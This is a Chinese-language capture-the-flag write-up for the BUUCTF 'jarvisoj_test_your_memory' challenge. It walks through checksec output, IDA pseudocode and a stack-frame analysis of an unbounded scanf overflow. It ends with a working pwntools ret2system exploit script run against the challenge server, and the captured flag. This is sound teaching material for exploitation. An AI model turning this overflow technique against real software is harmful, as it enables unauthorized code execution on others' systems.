BUUCTF jarvisoj_test_your_memory
system和cat flag
jarvisoj_test_your_memory
(1)
motaly@motaly-VMware-Virtual-Platform:~/桌面$ file memory
memory: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=3ccdcfa18c0e3f68845cc554555ad0dd9c182858, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=memory
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 79 Symbols No 0 2 memory
(2)
用 IDA 打开，反编译后查看 main 函数的伪代码
/*
 * IDA pseudocode of main(): builds a 10-character token from the
 * alphanum_2626 table, prints it, then hands it to mem_test().
 *
 * NOTE(review): s2 is declared as 11 bytes but only s2[0..9] are written and
 * the array is never zeroed, so the "%s" print can run past the token into
 * whatever stack bytes follow it. The PRNG is seeded with time(0), so the
 * token is predictable; the exploit below does not need it either way.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  time_t seed; // eax
  char s2[11]; // [esp+1Dh] [ebp-13h] BYREF
  int n10; // [esp+28h] [ebp-8h]
  int i; // [esp+2Ch] [ebp-4h]

  n10 = 10;
  puts("\n\n\n------Test Your Memory!-------\n");
  seed = time(0);
  srand(seed);
  /* 0x3E == 62: index into the alphanumeric table */
  for ( i = 0; i < n10; ++i )
    s2[i] = alphanum_2626[rand() % 0x3Eu];
  printf("%s", s2);
  mem_test(s2);
  return 0;
}
先用 time(0) 作种子，生成一个长度为 10 的随机字符串写入 s2 并打印出来。注意 s2 虽然声明为 11 字节，但只写入了前 10 个字符且没有补 '\0'，所以 printf("%s") 可能会把后面的栈上字节一起打印出来。
然后看到一个mem_test函数,s2作为参数
/*
 * IDA pseudocode of mem_test(): reads a token from stdin into a stack buffer
 * and compares its first 4 bytes with the token generated in main().
 *
 * Security-relevant points visible here:
 *  - scanf("%s", s) has no width limit: a classic stack buffer overflow.
 *    s sits at ebp-0x13 (see the IDA stack frame below), so 0x13 bytes reach
 *    the saved ebp and 4 more reach the return address. checksec reports no
 *    stack canary and no PIE, so the return address can be overwritten with
 *    fixed addresses directly.
 *  - printf("0x%x", hint) leaks the value of the global pointer hint, i.e.
 *    the address of the "cat flag" string that system() can be pointed at.
 *  - memset only zeroes the first 0xB of the 19 declared bytes.
 *  - strncmp with n = 4 only checks 4 characters; which branch is taken is
 *    irrelevant once the return address has been hijacked.
 */
int __cdecl mem_test(char *s2)
{
  char s[19]; // [esp+15h] [ebp-13h] BYREF

  memset(s, 0, 0xBu);
  puts("\nwhat???? : ");
  printf("0x%x \n", hint); // "cat flag"
  puts("cff flag go go go ...\n");
  printf("> ");
  __isoc99_scanf("%s", s); /* unbounded write into s -> overflow */
  if ( !strncmp(s, s2, 4u) )
    return puts("good job!!\n");
  else
    return puts("cff flag is failed!!\n");
}
看到这里有一个全局指针 hint，指向字符串 "cat flag"，程序用 printf("0x%x") 把它的值（也就是该字符串的地址）打印了出来；由于程序是 No PIE，这个地址是固定的，在 IDA 里也能直接查到。
接着用 scanf("%s") 把输入写入 s，没有限制输入长度，存在栈溢出；结合 checksec 结果（无 canary、No PIE），可以直接覆盖返回地址。
最后用 strncmp 比较输入 s 和 s2 的前 4 个字符是否相同；这个检查只看 4 个字节，而且对利用来说无关紧要，因为返回地址已经被覆盖。
这里看ida
-0000000000000017 // padding byte
-0000000000000016 // padding byte
-0000000000000015 // padding byte
-0000000000000014 // padding byte
-0000000000000013 _BYTE s;
-0000000000000012 // padding byte
-0000000000000011 // padding byte
-0000000000000010 // padding byte
-000000000000000F // padding byte
-000000000000000E // padding byte
-000000000000000D // padding byte
-000000000000000C // padding byte
-000000000000000B // padding byte
-000000000000000A // padding byte
-0000000000000009 // padding byte
-0000000000000008 // padding byte
-0000000000000007 // padding byte
-0000000000000006 // padding byte
-0000000000000005 // padding byte
-0000000000000004 // padding byte
-0000000000000003 // padding byte
-0000000000000002 // padding byte
-0000000000000001 // padding byte
+0000000000000000 _DWORD __saved_registers;
+0000000000000004 _UNKNOWN *__return_address;
+0000000000000008 char *s2;
+000000000000000C
+000000000000000C // end of stack variables
s 位于 ebp-0x13，所以填充 0x13 字节到达保存的 ebp，再加 4 字节覆盖 ebp，之后紧接着就是返回地址：偏移量为 0x13+4。
(3)
看到有一个win_func函数
/*
 * Convenience target left in the binary: passes its single argument straight
 * to system() and returns whatever system() returns.
 */
int __cdecl win_func(char *command)
{
  int status;

  status = system(command);
  return status;
}
里面直接把参数传给了 system。所以既可以返回到 win_func，也可以直接返回到 system（脚本中使用的 0x8048440），两者都只需要一个参数。
(4)
这里我们可以把cat flag当作system的参数来获得flag
直接在 IDA 中找到 "cat flag" 字符串的地址（0x80487E0），也可以从程序运行时打印的 hint 值中读出。
编写
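from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote('node5.buuoj.cn', 28766)
# p = process('/home/motaly/桌面/memory')

# No PIE, so these are fixed addresses taken from IDA.
system = 0x8048440  # system
main = 0x8048677    # return here after system() so the process exits cleanly
flag = 0x80487E0    # address of the "cat flag" string (the value of `hint`)

# mem_test() prints "\nwhat???? : \n" and then the hint as "0x%x \n" before
# the "> " prompt. Read the leaked address and prefer it over the static one
# if they differ. Anchor on the fixed banner, not on "0x", because the random
# token printed by main() may itself contain those characters.
p.recvuntil(b'what???? : \n')
try:
    leaked = int(p.recvline().strip(), 16)
except ValueError:
    leaked = flag  # keep the static address from IDA
if leaked != flag:
    log.warning('leaked hint 0x%x differs from static 0x%x' % (leaked, flag))
    flag = leaked

# s is at ebp-0x13: 0x13 bytes fill the buffer up to the saved ebp, 4 more
# overwrite the saved ebp, then return address -> system, fake return
# address -> main, first argument -> "cat flag".
payload = b'a' * (0x13 + 4) + p32(system) + p32(main) + p32(flag)
# Send only once the prompt has been read, so the payload lands in scanf.
p.sendlineafter(b'> ', payload)
p.interactive()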
(5)
连接得到flag
[*] Switching to interactive mode
[DEBUG] Received 0x2b bytes:b'flag{67cb5c63-d6f7-4f7f-8746-3eb3f6e53c7b}\n'
flag{67cb5c63-d6f7-4f7f-8746-3eb3f6e53c7b}